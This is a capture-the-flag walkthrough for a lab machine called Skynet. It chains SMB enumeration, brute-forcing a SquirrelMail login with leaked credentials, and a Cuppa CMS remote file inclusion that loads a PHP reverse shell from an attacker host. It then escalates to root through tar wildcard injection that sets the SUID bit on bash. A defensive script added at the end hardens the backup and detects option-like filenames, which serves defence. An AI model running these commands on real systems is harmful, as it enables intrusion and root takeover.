Skynet

Tasks:

  1. Deploy and compromise the vulnerable machine:
    1. Run the usual nmap scan with nmap -sC -sV -T5 ip - ports 22, 80, 110, 139, 143 and 445 are open.
    2. Use smbclient -L \\\\ip\\ to list shares - anonymous and milesdyson are the unique ones.
    3. Log in to the anonymous share and download log1.txt and attention.txt with get log1.txt and get attention.txt. The log file contains potential usernames or passwords. attention.txt, written by Miles Dyson, is a message telling all users to change their passwords because of some malicious activity.
    4. Directory brute force with gobuster dir --wordlist=/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://ip/" --threads=100 reveals /squirrelmail, which is interesting.
    5. From attention.txt and the share list we can assume there is a user called milesdyson, and log1.txt might be a password list, so we can use it to brute-force the login page at /squirrelmail. Luckily the first password in log1.txt worked! [milesdyson:cyborg007haloterminator]
    6. In the mailbox there is an email containing the Samba password for user milesdyson - )s{A&2Z=F^n_E.B`
    7. Connect to the milesdyson share with that username: smbclient -U milesdyson \\\\10.10.179.35\\milesdyson, then get important.txt from the notes directory. It says a CMS exists at /45kra24zxs28v3yd. Directory brute force on /45kra24zxs28v3yd reveals an /administrator endpoint inside the CMS.
    8. Visiting /45kra24zxs28v3yd/administrator reveals it is Cuppa CMS. searchsploit cuppa and searchsploit -x 25971 show a Remote File Inclusion vulnerability at the /alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt endpoint.
    9. Serve the Pentest Monkey PHP reverse shell from a Python HTTP server (on port 8080, to match the URL below), start netcat with nc -nlvp 1234 and open http://victimip/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attackerip:8080/php-reverse-shell.php to get a reverse shell.
    10. Run python -c 'import pty; pty.spawn("/bin/bash")' to upgrade the default netcat shell to an interactive one.
    11. cat /home/milesdyson/user.txt and submit the user flag.
    12. cat /etc/crontab shows a cron job that executes /home/milesdyson/backups/backup.sh every minute.
    13. Looking at backup.sh, it backs up the files in /var/www/html every minute with tar cf /home/milesdyson/backups/backup.tgz * (an unquoted wildcard, so the shell expands it into the file names in that directory and passes each one to tar as an argument).
    14. This is a tar wildcard injection vulnerability: any file whose name starts with -- is parsed by tar as an option. cd /var/www/html, then echo "chmod 4777 /bin/bash" > bash_suid.sh (sets the SUID bit on bash when executed by root), echo "" > "--checkpoint-action=exec=sh bash_suid.sh" and echo "" > --checkpoint=1.
    15. After one minute, when the next backup job runs, type /bin/bash -p to get root.
    16. cat /root/root.txt to get the root flag and submit it.
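A defensive counterpart to steps 13 and 14, added here as an example that is not part of the original writeup: a backup invocation that cannot be steered by filenames, plus a helper that counts option-like names in a directory so an administrator can spot the precursor to this attack. It assumes only POSIX sh with GNU find(1) and tar(1), and works on a constructed temporary directory rather than a real web root.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Assumes POSIX sh with
# GNU find(1) and tar(1); no real web root is touched.

# Count the entries directly under DIR whose names begin with "-": names
# that an unquoted "tar cf backup.tgz *" would hand to tar as options.
count_dash_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

# Hardened form of the backup: change into SRC with -C and archive "."
# as the only operand, so every member is a literal path such as
# ./--checkpoint=1 and no filename ever reaches tar's option parser.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# Constructed directory standing in for /var/www/html after step 14.
demo_dir=$(mktemp -d)
demo_archive="${demo_dir}.tgz"   # archive lives outside the tree being backed up
printf 'hello\n' > "$demo_dir/index.html"
: > "$demo_dir/--checkpoint=1"
: > "$demo_dir/-rf"

echo "option-like filenames under $demo_dir: $(count_dash_names "$demo_dir")"  # → 2
safe_backup "$demo_dir" "$demo_archive"
tar -tf "$demo_archive"   # lists ./--checkpoint=1 as an ordinary member
```

Running count_dash_names against the real web root from the same cron job, and alerting when it returns non-zero, gives a cheap detection for step 14's preparation.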